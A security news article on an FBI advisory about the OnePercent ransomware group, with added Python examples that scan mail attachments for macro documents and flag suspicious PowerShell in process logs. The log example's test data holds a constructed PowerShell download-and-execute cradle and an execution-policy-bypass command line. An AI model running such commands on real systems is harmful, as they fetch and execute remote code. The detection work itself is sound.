FBI Issues Advisory on OnePercent Ransomware Group

Published: 23/11/2024   Category: security
The threat actor has been targeting US companies in dual extortion attacks since fall of last year.



A ransomware operator calling itself the OnePercent group has been attacking US companies since at least November 2020, using the Cobalt Strike post-exploitation toolkit and remote PowerShell commands to move laterally within compromised networks.
In an advisory this week, the FBI described the group as using phishing emails with a malicious zip-file attachment as the initial infection vector. The file has typically contained a Microsoft Word or Excel document with malicious macros that infect systems with IcedID, a known banking Trojan. The Trojan (which some vendors track as BokBot) then downloads additional malware, including Cobalt Strike, onto the compromised system.
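The delivery chain above (a zip attachment wrapping a macro-laden Word or Excel document) is something a mail gateway can check for before the document ever reaches a user. The following Python is an added example written for this page, not the FBI's or any vendor's code: it opens a zip attachment in memory, flags OOXML documents that carry a vbaProject.bin part, treats legacy binary Office files and script or executable members as blockable, and walks nested zips. The sample attachment it scans is constructed inline; names such as scan_zip_attachment and the "Invoice" file name are invented for the illustration.

```python
"""Scan a zip mail attachment for macro-capable Office documents (added example)."""
import io
import zipfile

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # Compound File header (legacy .doc/.xls)
OOXML_EXT = (".docx", ".docm", ".dotm", ".xlsx", ".xlsm", ".xltm", ".pptm")
LEGACY_EXT = (".doc", ".dot", ".xls", ".xlt")
SCRIPT_EXT = (".js", ".jse", ".vbs", ".hta", ".lnk", ".exe", ".scr", ".dll")
VBA_PARTS = ("word/vbaProject.bin", "xl/vbaProject.bin", "ppt/vbaProject.bin")
MAX_DEPTH = 2                                        # how many zip-in-zip levels to walk


def ooxml_has_vba(data):
    """OOXML documents are zips; a vbaProject.bin part means VBA is present.
    Check the container content rather than trusting the extension alone."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as doc:
            names = set(doc.namelist())
    except zipfile.BadZipFile:
        return False
    return any(part in names for part in VBA_PARTS)


def scan_zip_attachment(blob, depth=0):
    """Return (member, reason) tuples for members that should block delivery."""
    try:
        outer = zipfile.ZipFile(io.BytesIO(blob))
    except zipfile.BadZipFile:
        return [("<attachment>", "not a valid zip")]
    findings = []
    with outer:
        for info in outer.infolist():
            if info.is_dir():
                continue
            name, lower = info.filename, info.filename.lower()
            try:
                data = outer.read(name)
            except RuntimeError:                     # password-protected member
                findings.append((name, "encrypted member (cannot inspect)"))
                continue
            if lower.endswith(OOXML_EXT):
                if ooxml_has_vba(data):
                    findings.append((name, "OOXML document carrying a VBA project"))
            elif lower.endswith(LEGACY_EXT) or data.startswith(OLE_MAGIC):
                # Legacy binary formats need an OLE parser to prove macros absent;
                # treat them as macro-capable and hand them to a sandbox.
                findings.append((name, "legacy OLE Office document (macro-capable)"))
            elif lower.endswith(SCRIPT_EXT):
                findings.append((name, "script or executable inside archive"))
            elif lower.endswith(".zip") and depth < MAX_DEPTH:
                for inner, reason in scan_zip_attachment(data, depth + 1):
                    findings.append((name + "/" + inner, reason))
    return findings


def build_zip(members):
    """Build a zip in memory from {name: bytes-or-str}; used for constructed samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, data in members.items():
            z.writestr(name, data)
    return buf.getvalue()


def make_ooxml(with_vba):
    """Minimal stand-in for a Word OOXML file, with or without a VBA project part."""
    parts = {"[Content_Types].xml": "<Types/>", "word/document.xml": "<w:document/>"}
    if with_vba:
        parts["word/vbaProject.bin"] = OLE_MAGIC + b"\x00" * 64
    return build_zip(parts)


def build_sample_attachment():
    """Constructed lure (not a real sample): one macro document, one clean one."""
    return build_zip({
        "Invoice_2021-03.docm": make_ooxml(True),
        "Cover_letter.docx": make_ooxml(False),
        "readme.txt": "please see attached",
    })


if __name__ == "__main__":
    for member, reason in scan_zip_attachment(build_sample_attachment()):
        print("BLOCK", member, "-", reason)
```

Only the .docm with a VBA part is reported; the clean .docx and the text file pass. Encrypted members are reported rather than silently skipped, since a scanner that cannot look inside an archive should not clear it.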
As has become common among ransomware operators, the OnePercent group's attacks have involved double extortion. The group not only encrypts data but also exfiltrates it and uses the threat of public exposure as additional leverage to extract payment from victims. Among the tools and infrastructure the FBI listed the group as using are AWS S3 storage buckets, PowerShell, Cobalt Strike, Mimikatz, SharpSploit, and SharpKatz. Many of these are dual-use tools with legitimate administrative and testing uses, so their presence alone is not proof of compromise; what matters for detection is the context in which they run.
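Because these tools are dual-use, a useful detection keys on context rather than on the binary itself: which process launched a script host, and whether the command line hides its intent behind PowerShell's -EncodedCommand. The Python below is an added example, not the FBI's or Digital Shadows' code, covering the two behaviours the article names: an Office document spawning a script host (the macro step of the infection chain) and remote PowerShell used for lateral movement (a process whose parent is wsmprovhost.exe, the host for inbound WinRM/PowerShell remoting sessions). The log lines are constructed for the example in a simplified key="value" rendering of process-creation fields (Windows Security event 4688 style); the field names, host names and the download cradle are assumptions, not real telemetry.

```python
"""Flag Office-spawned script hosts, inbound PS-remoting children and encoded
PowerShell in process-creation records (added example with constructed input)."""
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
REMOTING_HOSTS = {"wsmprovhost.exe"}   # hosts inbound WinRM / PowerShell remoting sessions
# -e / -ec / -enc / -EncodedCommand take a base64 blob of UTF-16LE script text.
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
KV = re.compile(r'(\w+)="([^"]*)"')

# Constructed download cradle and its encoded form (192.0.2.0/24 is a documentation range).
PS_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a')"
ENCODED = base64.b64encode(PS_CRADLE.encode("utf-16-le")).decode("ascii")

# Constructed records, not real telemetry: a simplified key="value" view of 4688 fields.
SAMPLE_LINES = [
    'EventID="4688" Computer="WS-0417" '
    'ParentProcessName="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" '
    'NewProcessName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'CommandLine="powershell.exe -nop -w hidden -enc ' + ENCODED + '"',
    'EventID="4688" Computer="WS-0417" ParentProcessName="C:\\Windows\\explorer.exe" '
    'NewProcessName="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" '
    'CommandLine="WINWORD.EXE /n Invoice.docm"',
    'EventID="4688" Computer="SRV-FS01" ParentProcessName="C:\\Windows\\System32\\wsmprovhost.exe" '
    'NewProcessName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'CommandLine="powershell.exe -ExecutionPolicy Bypass -File C:\\Users\\Public\\s.ps1"',
]


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_record(line):
    """Turn one key="value" record into a dict."""
    return dict(KV.findall(line))


def decode_encoded_command(cmdline):
    """Return the decoded script text if the command line carries an encoded command."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(lines):
    """Return one alert per record that matches any of the three behaviours."""
    alerts = []
    for line in lines:
        rec = parse_record(line)
        parent = basename(rec.get("ParentProcessName", ""))
        child = basename(rec.get("NewProcessName", ""))
        reasons = []
        if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
            reasons.append(f"{parent} spawned {child}")
        if parent in REMOTING_HOSTS:
            reasons.append(f"{child} started by {parent} (inbound PowerShell remoting)")
        decoded = decode_encoded_command(rec.get("CommandLine", ""))
        if decoded is not None:
            reasons.append("encoded PowerShell decodes to: " + decoded)
        if reasons:
            alerts.append({"host": rec.get("Computer", "?"), "process": child, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LINES):
        print(alert["host"], alert["process"])
        for reason in alert["reasons"]:
            print("   ", reason)
```

The second sample record (Explorer launching Word) produces no alert, which is the point: Word itself is benign, and only the parent-child pair and the decoded command line carry signal. The third record would be invisible to a detection that only looked for Cobalt Strike or Mimikatz binaries, yet a PowerShell session hosted by wsmprovhost.exe on a file server is exactly the remote-PowerShell lateral movement the advisory describes.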
The OnePercent group's modus operandi has involved leaving a note on compromised systems informing victims that their data has been both encrypted and stolen. The note instructs the victim organization to contact the threat group via a Tor communication channel to arrange the ransom payment. If the victim doesn't respond within a week, the attackers switch to contacting them persistently by phone using spoofed numbers and demanding to speak with the company's ransom negotiator.
If a victim doesn't respond to the phone calls, the threat actor sends an email from a ProtonMail email address threatening to publicly release the victim's stolen data, the FBI said.
One Percent Leak
A continued failure to respond or to make the ransom payment within the stipulated time frame results in the attacker releasing a portion of the stolen data, a "one percent leak", as proof of intent and capability. That move is followed by a threat to sell the stolen data in full to the rival ransomware operator Sodinokibi (aka REvil), which in turn would auction the data to the highest bidder.
OnePercent group actors' extortion tactics always begin with a warning and progress from a partial leak of data to a full leak of all the victim's exfiltrated data, the FBI said in its advisory.
This ransomware gang is yet another in a seemingly never-ending stream of new players on the ransomware scene. Security researchers have attributed the rapidly growing number of players to the easy availability of ransomware-as-a-service (RaaS) operations such as DarkSide, REvil, LockBit, and Netwalker. RaaS offerings, in which an operator leases out its ransomware tool and infrastructure in exchange for a portion of ransom payouts, have allowed even novice attackers to deploy relatively sophisticated malware against targets of their choice.
Why Now?
Alec Alvarado, threat intelligence team lead at Digital Shadows, says the FBI's reason for releasing an advisory on the OnePercent group's operation is not clear. "It is certainly interesting to ponder why the FBI chose the OnePercent group to release a Flash about, as the group doesn't necessarily appear to sway significantly from known ransomware tactics," Alvarado says.
One likelihood is that the FBI suspects increased activity by the group. Or it was motivated by the limited reporting on the group's activities within the industry so far, he says.
Regardless of the FBI's motive, the OnePercent ransomware group's operations are another example of the cooperation that exists between some ransomware groups, Alvarado notes. Based on the [indicators of compromise] released in the FBI Flash, he says, OnePercent appears to relate in some fashion to the threat actor tracked as UNC2198, reportedly known to distribute either the Maze or Egregor ransomware.
